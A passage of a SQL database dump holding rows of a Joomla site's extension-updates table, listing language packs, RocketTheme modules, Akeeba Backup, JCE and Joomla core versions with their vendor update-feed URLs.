Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(25067,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(25068,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25069,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25070,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25071,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25072,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25073,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25074,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25075,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25076,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25077,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25078,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25079,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25080,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25081,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25082,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25083,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25084,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25085,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25086,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25087,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25088,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25089,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25090,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25091,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25092,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25093,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25094,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25095,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25096,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25097,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25098,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25099,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25100,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25101,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25102,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25103,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25104,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25105,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25106,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25107,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25108,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25109,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25110,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25111,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25112,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25113,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25114,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25115,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25116,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25117,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(25118,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(25119,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(25120,129,0,'JCE 2.9.1','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.1','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-0-released',''),(25121,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25122,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25123,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25124,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25125,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25126,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25127,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25128,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25129,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25130,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25131,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25132,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25133,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25134,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25135,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25136,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25137,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25138,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25139,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25140,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25141,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25142,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25143,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25144,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25145,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25146,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25147,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25148,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25149,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25150,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25151,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25152,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25153,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25154,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25155,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25156,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25157,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25158,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25159,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25160,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25161,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25162,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25163,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25164,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25165,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25166,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25167,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25168,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25169,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25170,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25171,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25172,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25173,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25174,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25175,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25176,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25177,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25178,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25179,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25180,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25181,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25182,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25183,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(25184,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(25185,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(25186,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(25187,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(25188,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(25189,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(25190,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(25191,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(25192,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25193,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25194,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25195,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25196,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25197,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25198,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25199,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25200,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25201,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25202,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25203,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25204,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25205,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25206,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25207,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25208,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25209,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25210,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25211,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25212,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25213,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25214,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25215,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25216,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25217,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25218,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25219,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25220,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25221,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25222,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25223,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25224,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25225,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25226,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25227,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25228,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25229,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25230,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25231,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25232,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25233,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25234,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25235,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25236,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25237,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25238,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25239,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25240,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25241,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(25242,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(25243,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(25244,129,0,'JCE 2.9.1','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.1','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-0-released',''),(25245,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25246,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25247,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25248,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25249,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25250,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25251,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25252,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25253,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25254,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25255,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25256,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25257,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25258,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25259,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25260,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25261,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25262,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25263,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25264,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25265,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25266,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25267,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25268,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25269,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25270,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25271,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25272,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25273,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25274,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25275,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25276,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25277,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25278,3,0,'English 